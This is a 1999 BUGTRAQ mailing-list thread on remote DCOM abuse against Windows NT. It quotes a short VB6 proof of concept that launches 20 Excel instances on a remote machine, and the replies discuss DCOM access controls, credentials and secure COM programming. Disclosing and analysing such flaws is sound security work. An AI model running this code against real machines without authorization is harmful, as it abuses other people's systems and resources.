Re: FW: DCOM attack against NT using VB6

[Matt_Hargett () NAI COM (Hargett, Matt)]

Just so you know, the original mail was just a forward from the NTBUGTRAQ
list. I forwarded it because I hadn't seen any mention on BUGTRAQ itself. I
haven't tested this exploit myself, nor do I have any other exploit code
tucked away somewhere.

Moving on-- Depending on the access/launch/configure ACLs on a given DCOM
object, authentication may or may not matter. Using the DCOMCNFG utility
(included with NT4/5 and Win95/98), you can view the Access/Launch/Configure
permissions for the DCOM objects present on your system (that are accessible
via the network).

Depending on how farmiliar the person who wrote the DCOM app is with
CoInitializeSecurity (the COM API call for setting ACLs for
Access/Launch/Configure), there are programmatic methods for launching,
configuring, or deleting COM objects on a remote machine (as shown in the
VB6 program below). This is similar to the problem of many win32 coders not
setting ACLs on named pipes and other objects their applicatitons create.

In these instances, it's not Microsoft's lack of a comptetent security
model--it's the people writing to the API not taking the time to actually
understand it. For those interested in learning how to write (more) secure
COM apps, the book "Effective COM" (ISBN 0-201-37968) has an excellent
chapter on COM Security.

-----Original Message-----
From: Max Vision [mailto:vision () whitehats com]
Sent: Thursday, August 19, 1999 5:39 PM
To: Hargett, Matt; BUGTRAQ () SECURITYFOCUS COM
Subject: Re: FW: DCOM attack against NT using VB6

Hi,

Did you have credentials to authenticate to your coworker's machines?  I
was able to create arbitrary files remotely on other NT machines in my
network using DCOM/Word/Create, but soon discovered that this was because
I had domain admin credentials that were valid for each host.  IE, DCOM
attacks aren't effective if you don't have authentication credentials.

If you have contrary information please let us know :)  I could be
mistaken, since ISS does a test for non-admin access to DCOM..  What are
the chances ISS/NAI want to give full disclosure on their DCOM compromise
technique?

Required reading:

 Understanding the DCOM Wire Protocol by Analyzing Network Data Packets
 http://www.guyeddon.com/MSJ3-98.htm

 Using Distributed COM with Firewalls
 http://www.iapetus.com/dcom/dcomfw.htm

Max Vision
http://maxvision.net/

On Wed, 18 Aug 1999, Hargett, Matt wrote:
> -----Original Message-----
> From: Rob Lempke [mailto:rlempke () ADNET2000 COM]
> Sent: Wednesday, August 11, 1999 1:27 PM
> To: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM
> Subject: DCOM attack against NT using VB6
>
>
> Using the code below I was able to create 20 instances of Excel on my
> co-workers machines without modifying their machines at all.  The target
> must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
> prevent the attack.
>
> Private Sub Command1_Click()
>     Dim xlObj As Object
>     Dim xlCollection As New Collection
>     Dim i As Long
>     For i = 1 To 20
>         Set xlObj = CreateObject("Excel.Application", "\\NTBox")
>         xlCollection.Add xlObj
>     Next i
>
>     i = 1
>     'clean up
>     While xlCollection.Count > 0
>         xlCollection.Remove (xlCollection.Count)
>     Wend
>     Set xlCollection = Nothing
> End Sub
>
> -Robert E. Lempke
> --------------------------------------------
> Steven Wright one Liners:
> "Black holes are where God divided by zero."
> "Quantum Mechanics:  The dreams stuff is made of."
> "Early bird gets the worm, but the second mouse gets the cheese."
> "If everything seems to be going well, you have obviously overlooked
> something."
> "Join the Army, meet interesting people, kill them."
> "Success always occurs in private, and failure in full view."
> "Ambition is a poor excuse for not having enough sense to be lazy."
> "Hard work pays off in the future.  Laziness pays off now."
> "Everyone has a photographic memory.  Some don't have film."
> "Drink until she's cute, but stop before the wedding."
> --------------------------------------------